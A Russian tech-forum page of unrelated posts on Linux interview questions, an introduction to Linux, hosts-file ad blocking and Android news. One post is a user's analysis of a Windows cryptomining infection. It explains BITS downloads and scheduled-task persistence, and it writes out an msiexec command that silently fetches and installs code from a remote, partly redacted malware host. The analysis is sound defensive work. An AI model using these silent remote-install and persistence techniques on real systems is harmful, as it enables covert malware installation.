О: Виртуалку можно определить по косвенным признакам. Например, не соответствие количества ядер и названия процессора. Не типовые объёмы диска или памяти. Опять же, вывод dmidecode будет меньше, чем на физическом сервере. В выводе будет фигурировать название гипервизора. Командами lspci, lsusb и dmesg так же можно посмотреть вендора оборудования там тоже будет упоминание гипервизора или вендора гипервизора.

В+: А более гарантировано и проще?

О+: Команда lscpu показывает, что процессор виртуализирован и название вендора гипервизора. На RHEL-based дистрибутивах есть команда virt-what, которая возвращает так же вендор гипервизора.


В: Вы подключились к серверу по ssh, видите, что это нечто линуксоподобное, но надо понять какая именно система перед нами.

О: Можно командой uname -a определить тип архитектуры и версию ядра. Если архитектура sparc - скорее всего перед нами Solaris. Если в названии ядра есть darwin - это macOS. Если в номере версии ядра есть el6, 7 или 8 - это что-то на базе RHEL. Буквы EL - Enterprise Linux. Цифра - мажорная версия. Можно по пакетному менеджеру. Yum, apt, yast, pkg и т.д.

В+: А явно?

О+: В папке /etc должен быть файл с названием, в котором есть слово release. Это centos_release, lsb_release и т.п. Можно сделать cat /etc/*release* и это покажет как название дистрибутива, так и его полную версию. Это работает на Solaris и большинстве Linux дистрибутивов. На mac для этого есть команда sw_vers.


В: При попытке запустить например apache он ругается, что 80 порт занят. Как посмотреть кем?

О: Командой netstat с ключами -p (port) и -l (listen).

В+: А если такой команды нет?

О+: В частном случае можно поискать в /etc конфиги других web серверов. Или можно воспользоваться командой ss с теми же ключами -lp.

В++: Есть ли какие либо ограничения при использовании этих команд?

О++: Да, PID будет показан только если команда исполняется от superuser, например от root. Либо надо дать право на работу с сокетами непривилегированным пользователям.


В: Выстрел самому себе ногу. Сделали chmod -x /bin/chmod. Как вернуть без перезагрузки?

О: Скопировать с другого сервера или с подключённого внешнего носителя.

В+: А без внешних операций?

О+: В linux при копировании происходит копирование его атрибутов. Можно скопировать любой файл в /bin и командой cat влить в него содержимое /bin/chmod. После чего получившимся файлом вернуть права на исходный.


В: Какие есть варианты авторизации по ssh?

О: По логину и паролю, по логину и ключу.

В+: А ещё?

О+: Через pam можно добавить любой другой метод. Например двухфакторную авторизацию сделать или доменную авторизацию без ввода в домен.


В: Как посмотреть все WWN сервера?

О: systool -c fc_host -v | grep ‘port_name’ или cat /sys/class/fc_host/host*/port_name

В+: А что такое WWN?

О+: Грубо говоря, это аналог mac-адреса, но в san сетях.


В: Мне надо запустить один и тот же скрипт 10 раз параллельно. Например некий нагрузочный тест. Как сделать это и как по завершению теста завершить все скрипты одной командой?

О: Надо иметь некий родительский скрипт, который через «&» запустит дочерние. При этом надо не давать завершиться родительскому скрипту. В таком случае сделав kill -9 pid_родительского_скрипта завершатся и дочерние скрипты.

В+: А если родительский скрипт завершится? Кто станет родителем дочерних?

О+: Процессы не могут существовать без родительского. В таком случае их родителем станет init или процесс с PID 0.

В++: Как посмотреть какие процессы были запущены через «&»?

О++: Командой jobs или аналогами.


В: Как посмотреть дерево процессов?

О: Командой pstree или ptree, в зависимости от дистрибутива.

В+: А более развёрнуто?

О+: Например через ps auxwwf


Продолжение следует. Небольших вопросов осталось примерно на один пост. Последний вопрос самый объёмный и он потянет на целый пост.

Показать полностью
98

Linux для тебя

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Дисклеймер: Я никого не призываю переходить на другую операционную систему(ОС), а просто хочу показать, что существуют альтернативные ОС. Выбор всегда за вами.


Начну, пожалуй с истории. Все началось с UNIX систем, которые в конце 60-x годов были разработаны сотрудники компании Bell Labs. Они мало чем были похожи на современные ОС, просто терминал и компилятор под ассемблер. Компания AT&T, которой принадлежала Bell Labs понимала коммерческую ценность UNIX, но из-за запрета наложенного правительством США, компания могла заниматься только телефонными сетями и смежным оборудованием. Для того, чтобы обойти запрет, компания передала исходный код ОС некоторым высшим учебным заведениям. Одним из первых исходный код получил университет Беркли.

В университете Беркли начинается история семейства Berkeley Software Distribution (BSD) систем, которые считаются UNIX подобными ОС. Со временем большая часть кода была переписана сотрудниками университета, что в дальнейшем позволило отделится от AT&T. Про BSD системы обычный пользователь ничего не знает т.к. они не смогли получить большой популярности у обычных пользователей, об этом чуть позже. Но в тоже время компания Apple использовала большую часть кода FreeBSD для создания MacOS, Sony и Nintendo использовали ее для своих приставок, сервера WhatsApp и Netflix тоже работают под управлением ОС семейства BSD. Парадокс - непопулярная ОС используется в популярных продуктах.


В 1991 году Линус Торвальдс студент Хельсинского университета, начал написание ядра Linux. Когда он выложил исходный код, другие разработчики заинтересовались и стали помогать в разработке ядра.

Так почему более зрелая и мощная система BSD не сыскала популярности в open source сообществе в отличии от Linux? Все дело в лицензии под которой распространяется ОС. Лицензия BSD позволяет использовать ее код, а затем сделать его закрытым, так в свое время поступила Apple. С Linux так сделать нельзя, лицензия обязывает после изменения кода выложить его в открытый доступ, поэтому сообществу выгодно писать программное обеспечение (ПО) под лицензией Linux.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

С того момента было создано огромное количество дистрибутивов на основе ядра Linux. Коммерческие организации также участвуют в разработке ядра и поддерживают open source сообщество.


Дерево Linux дистрибутивов(в высоком разрешении)

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Если посмотреть статистику использования ОС в сегменте персональных компьютеров, около 77% это Windows, 16% это MacOS и какие-то 2% Linux. Дело в том, что Windows и MacOS коммерческие ОС, которые продвигались на рынке ПК, когда Linux использовалась в основном для серверов и маршрутизаторов. На самом деле Linux работает в большем количестве устройств, чем может показаться на первый взгляд: маршрутизаторы, умная техника, смартфоны(Android основан на ядре Linux), супер компьютеры, сервера. Каждый день мы косвенно используем Linux. Ошибочно мнение, что Windows популярная ОС, исторически так сложилось, что большое количество ПО было написано под нее, дает о себе знать и сарафанное радио. Подавляющее большинство с детства пользуется ПК под управлением Windows и когда человек приобретает новый ПК или ноутбук, как правило с предустановленной Windows или устанавливает ее сам - дело привычки.


Теперь хочу рассказать как я познакомился с миром Linux. До университета я был обычным пользователем Windows и только слышал о существовании Linux. Когда мне пришлось по надобности столкнуться с этой ОС, а я ничего особо не знал, то я поставил самый популярный дистрибутив Ubuntu и пользовался им около недели. Он мне не понравился и я стал пробовать другие дистрибутивы. Дольше всего я использовал Fedora от Red Hat и Elementary OS. Сейчас использую Manjaro с рабочим окружением KDE, вообще рабочие окружения это отдельная тема. Существует огромное количество дистрибутивов и такое многообразие может отпугнуть неподготовленного пользователя.


Fedora с окружением Gnome
Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

elementary OS

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

Manjaro с окружением KDE Plasma 5

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В основном, когда человек задумывается о переходе на новую ОС, его останавливает мысль об отсутствии привычных программ. Я провел небольшой опрос среди своих друзей и знакомых, чем они пользуются ежедневно для решения своих задач.

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В опросе участвовало 25 человек. Для большинства людей необходим браузер, офисный пакет, мессенджер и графический редактор. Большая часть ПО нативно есть под Linux, а остальная имеет достойные альтернативы. Например, пакет MS Office я заменил на Google Docs и Open Office, они прекрасно справляются со своими задачами и имеют обратную совместимость с MS Office. Для работы с фото Krita и Gimp, для видео DaVinci Resolve и Kdenlive, LMMS и Audacity использую для работы с аудио. Дефицита программ нет и они бесплатные.


Установил нескольким друзьям и девушке, пока всем всё нравится

Linux для тебя Linux, Windows, Программное обеспечение, Операционная система, Ноутбук, ПК, Android, Длиннопост

В СНГ пользователи персональных ПК не пользуются лицензионным софтом. Все привыкли пиратить все, что можно. За свою жизнь не встречал тех, кто имеет подписку Adobe или MS Office, кроме бизнес сегмента. В СНГ пиратство не наказуемо для пользователя ПК. Но кроме моральных терзаний, есть еще один момент, задумывались ли вы, какая выгода человеку, который взламывает ПО и отдает его в массы, это хорошая пища для размышления.


Что в итоге? Linux дает безопасность, стабильность, полный контроль над ОС и бесплатное ПО. Тем более попробовать Linux всегда можно не отказываясь от Windows - поставить на виртуальную машину или как вторую систему и в дальнейшем снести винду полностью перейти на Linux.

Показать полностью 7
804

Google планирует перевести Android на стандартное ядро Linux

Мобильная операционная система Android использует специальную версию ядра Linux, которая подверглась ряду изменений со стороны производителей железа для смартфонов. Но вскоре ситуация может измениться: по заявлению представителей Google, компания планирует минимизировать разницу между Linux и Android, сделав популярную ОС ещё более универсальной.

Google планирует перевести Android на стандартное ядро Linux Операционная система, Google, Android, Linux, Длиннопост

Динамика изменений ядра Linux


На конференции Linux Plumbers разработчики Google сообщили, что компания заинтересована в максимальном приближении Android к ядру Linux. Это позволит решить ряд технических проблем, отказавшись от тысяч программных изменений в каждой новой прошивке. Кроме того, компания сможет отказаться от поддержки фиксированных версий ядра Linux в течение шести лет, как это реализовано сейчас.


Переход на ядро ARM Linux, по словам разработчиков, станет выигрышным и для рядового пользователя, поскольку положительно скажется на производительности и автономности устройств. Сейчас Google работает над объединением как можно большего числа модификаций Android в основное ядро Linux. По состоянию на февраль 2018 года ядро Android имело около 32 000 дополнений и 1,5 тысячи удалённых фрагментов сравнительно с оригинальным Linux 4.14.0.

Google планирует перевести Android на стандартное ядро Linux Операционная система, Google, Android, Linux, Длиннопост

В ходе конференции был продемонстрирован смартфон Xiaomi Pocophone, работающий под управлением Android 10, построенной на базе основного ядра Linux. Идея Google заключается в создании универсального интерфейса, который позволял бы активировать аппаратные элементы устройства в виде подключаемых модулей с установкой необходимых драйверов. При этом вносить изменения в само ядро ОС не потребуется.


Сроки реализации проекта по переходу на «десктопное» ядро операционной системы корпорация пока не объявила.



Источник 4da


Источник androidpolice

Показать полностью 1
537

Первый эшелон: блокировка интернет-шлака через HOSTS


Давным-давно, когда Интернета еще не было, человечество собиралась поработить компьютерная сеть SkyNet ARPANET, к которой на пике ее расцвета было подключено аж несколько сотен компов. Поэтому список всех существующих необходимых в работе сетевых ресурсов и их адреса хранились на каждом таком компьютере, в файле HOSTS.TXT


С тех пор к уже глобальной Сети подключили еще сколько-то миллиардов компьютеров, смартфонов, телевизоров, утюгов и других устройств, которым доступны миллиарды сайтов, IP-адреса которых постоянно меняются. В общем, все стало сложно, но файл HOSTS.TXT (ныне просто hosts) остался и работает так же, как и 30+ лет назад.


Если кратко и без зауми, то работает он так: вы в браузере набираете «pikabu.ru» и ваша Windows/Android/iOS первым делом лезет в файл hosts на вашем устройстве – проверить, не сказано ли там что-нибудь про искомый сайт. Если не сказано, тогда начинаются DNS-запросы во внешний мир и прочая суета, к делу не относящаяся, а вот если сказано... то смотря что.


Нас интересует не все богатство возможностей манипуляций с этим файлом, а лишь одно из возможных (и, к слову, нецелевое) его использований – в качестве первого эшелона обороны от разнообразного интернет-шлака – рекламы, счетчиков, трекеров и прочей гнуси, любезно подсовываемой нам сегодня каждым первым сайтом.


С помощью файла hosts мы можем сказать своей операционной системе: ресурса, к которому ты собираешься обратиться, согласно инструкциям, полученным на открытом нами сайте, не существует, даже не пытайся его загрузить. Говорится это так: в «Блокноте» открывается файл hosts (обычно находится в папке C:\Windows\System32\Drivers\Etc), в него добавляется строчка, например, 0.0.0.0 googleads.g.doubleclick.net после чего файл сохраняется.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы
Все, большинство шлака от рекламной сети Google даже не загружается на наш комп, а сама Корпорация Добра лишается одной из возможностей шпионить за нами. googleads.g.doubleclick.net – это доменное имя, ресурсы с которого мы загружать не хотим. 0.0.0.0 – адрес, на который мы принудительно переадресуем все запросы к доменному имени googleads.g.doubleclick.net В данном случае этот адрес будет расценен операционной системой, как заведомо несуществующий, и запрос к нему будет сброшен.
Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

Как узнать, какие доменные имена стоит заблокировать в hosts? Самый простой способ – скачать один из готовых и регулярно обновляемых списков, например, MVPS HOSTS. Плюсы – все уже сделано за вас, минусы – те же самые: в список могли добавить что-то лишнее, что именно вам не мешает и даже наоборот, а чего-то, мешающее именно вам, могли и не добавить.


Я добавляю вручную, узнавая имена мешающих мне доменов с помощью инструментов разработчика, встроенных в Firefox (в Chrome есть аналог). Инструменты/Веб-разработка/Сеть, «Обновите», клик на колонке «Домен», чтобы отсортировать список открытых страницей подключений по доменным именам.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

И вот, на примере сайта РБК, видим кучу доменных имен, которые мы не заказывали – счетчик, рекламная сеть, снова счетчик, опять счетчик, и еще раз счетчик... (читай – шпионский модуль), и это лишь то, что на скриншот влезло, а если прокрутить вниз, там еще сюрпризы будут. Вот их-то ручками, ручками – ничего лишнего, но и никто не спрячется. Видим в колонке «Статус» пустое место вместо «200» или иного кода – все правильно сделал!

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

Если же надо отловить самовольные запросы к посторонним доменам от других программ или самой операционной системы, на помощь приходит DNSQuerySniffer. Например, хочет Windows 10 слить в сеть «телеметрию» (строго в наших же интересах, конечно), а мы не хотим: запускаем DNSQuerySniffer, смотрим в реальном времени список доменных имен, к которым идут обращения, понимаем, что сами мы в этом время не обращались ни к одному из них, открываем файл hosts, copy/paste...


В чем недостатки способа блокировки через hosts и почему мы говорим лишь о первом (а значит, не единственном) эшелоне обороны от интернет-шлаков? Первый и главный – он не предусматривает возможности использовать «маски». Т.е., если нам надо заблокировать такие доменные имена:

1.doubleclick.net

2.doubleclick.net

...

99.doubleclick.net

нам придется их все, поименно добавлять в hosts, вместо того, чтобы добавить одну «маску» – *.doubleclick.net.


Второй: hosts позволяет заблокировать доступ к доменному имени вообще, для всех сразу, без исключений. Заблокировать доступ только браузеру, а почтовому клиенту оставить – невозможно, для этого нужен полноценный межсетевой экран (файрвол).


В остальном же – одни сплошные плюсы: изменения, внесенные в файл, активируются сразу; даже большой файл hosts не нагружает систему и не приводит к зависаниям браузера, логика работы списка блокированных доменов прозрачна. И, самое главное, заблокировать домен с мусором сможет даже не самый продвинутый пользователь ПК.

Первый эшелон: блокировка интернет-шлака через HOSTS Файл hosts, Информационная безопасность, Windows, Android, Интернет, Длиннопост, Блокировка рекламы

На закуску – немного дополнительных знаний, для интересующихся. Если не нашли ответа на свой вопрос – комменты открыты ;)


1. В Android файл hosts расположен в директории: /system/etc/ Права на файл (CHMOD): 644 (-rw-r-r--) Доступ к этой директории возможен лишь при наличии root-прав. Символ переноса строки в файле: LF (про это часто забывают, копируя файл из Windows).


2. Правильно посылать нежелательные домены на три буквы 0.0.0.0 (в Windows можно для краткости просто на 0), а не на 127.0.0.1 В контексте файла hosts 0.0.0.0 означает «несуществующий адрес», обращение к которому сразу приводит к завершению соединения. А 127.0.0.1 означает вполне себе существующий адрес – он служит для имитации обращения к тому же самому компьютеру из сети. Т.е. вместо сразу «нет такого адреса» мы получим через какое-то (пусть и небольшое) время «никто не отвечает». Хотя в некоторых случаях могут и ответить, что чревато сбоем системы.


3. Файл hosts – первый, но не единственный (и даже не главный) эшелон защиты компьютера от интернет-шлака. Не стоит забывать про межсетевой экран, системы контентной фильтрации, плагины для браузера с тем же назначением, да и просто грамотную настройку программ, вылезающих в Интернет. А для ценителей – локальные прокси, позволяющие вволю поглумиться над своим трафиком, прежде чем допускать его до браузера.

Показать полностью 4
106

Одноплатный компьютер Banana Pi BPI-M4 получил процессор Realtek

Рынок мини-компьютеров для разработчиков пополнился новой моделью: разработчики выпустили на этой неделе новую Banana Pi BPI-M4, которая может применяться при разработке устройств на базе ОС Android и Linux.

Одноплатный компьютер Banana Pi BPI-M4 получил процессор Realtek Banana Pi, Arm, Realtek, Linux, Android, Длиннопост
Одноплатный компьютер Banana Pi BPI-M4 получил процессор Realtek Banana Pi, Arm, Realtek, Linux, Android, Длиннопост
Одноплатный компьютер Banana Pi BPI-M4 получил процессор Realtek Banana Pi, Arm, Realtek, Linux, Android, Длиннопост

Пока неизвестно, когда плата станет доступна, в компании утверждают, что цены на Banana Pi BPI-M4 будут известны уже на следующей неделе.


ARMLab - канал про одноплатные компьютеры в Телеграм

Показать полностью 2
1339

Полмиллиона пользователей Android скачали опасный вирус

Полмиллиона пользователей Android скачали опасный вирус Android, Вирус

Эксперты в области кибербезопасности обнаружили в магазине Google Play 13 поддельных приложений, замаскированных под оригинальные программы. В общей сложности их скачали более 560 тысяч раз, пишет сотрудник компании ESET Лукас Стефанко (Lukas Stefanko) в своем Twitter.


Все вредоносные приложения-игры были опубликованы в магазине от имени разработчика Luis O Pinto. Сразу после установки программы удаляли свою иконку с экрана и запускали загрузку другого приложения в фоновом режиме.


Вторая программа, в свою очередь, маскировалась под сервис Game Center, который сразу же запрашивал разрешение на полный доступ к сети и автозапуску при включении смартфона. После одобрения пользователя троян начинал крутить рекламу на экране каждый раз, когда владелец телефона разблокировал его.


Журналисты The Bleeping Computer отметили, что модераторы Google Play не удалили приложения даже после того, как зараженные пользователи оставили множество отзывов о поддельном ПО. Ситуация изменилась лишь после того, как эксперты обнародовали информацию о вредоносных программах.

2200

Решение проблемы с пропажей места на жестком диске

Приветствую, пикабутяне.

С пару недель я страдал от постоянной нехватки места на компьютере на Windows 10. Стоило мне что-то удалить, как через какое-то время свободное место на диске становилось равно нулю. Поиски по интернету далеко не сразу привели меня к решению этой проблемы, по этому решил поделиться с вами вот здесь, мало ли кому пригодится.

Запустив программу SpaceSniffer (от имени Администратора), я увидел, что папка c\windows\temp занимает около 50% объема диска. Внутри обнаружилось десятки тысяч файлов под названиями Appx.... и тд. И вы сейчас скажете, что всего лишь то нужно было почистить Temp, а я тут целый пост развожу. Я тоже так думал, но после удаления файлов - проблема не решилась - файлы опять начали генерироваться с бешенной скоростью. А вот теперь перейдем к корню проблемы.

Идем в Настройки, Конфиденциальность и во вкладках Фоновые приложения и Диагностика приложения - сверху переключаем триггер в состояние Отключить.

Вот и все. Если подробнее, то какие-то службы винды, а именно магазина создавали кучу ошибок, логи которых как раз и забивали место не диске.

Надеюсь, кому-то спасу много часов :)

6372

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология
Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows. Windows, Вирус, Майнеры, Защита информации, Криптодженкинг, Криптовалюта, Уязвимость, Длиннопост, Вирусология

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

Показать полностью 17
3346

Как «заразить» Android смартфон вредоносным ПО

Телефон принесли в сервис, уже наверное, третий за неделю с вирусом, который рассылается через смс с другого заражённого устройства, при этом также списываются деньги с карт. Удалив вредоносное приложение через безопасный режим, решил повторить те действия которые необходимо выполнить, что бы «заразить» устройство. У меня просто нет слов…

104

Немного техновщины. Восстановление данных с полумёртвого аппарата на Android.

Я ни чуть не гуру в Android и информационных технологий в целом, но где-то по чуть-чуть что-то цепляю.

Прилетел сегодня аппарат: Lenovo S860. Девайс на MediaTek 6582. Робот древний (вроде v4.4) и не знаю, будет ли эта инструкция работать с Android 5+ (по крайней мере говорили, что начиная с 5-ой версии данные зашифрованы). Так что делайте на свой страх и риск. Данные вряд ли потеряете, но какое-то время это всё-таки займёт.

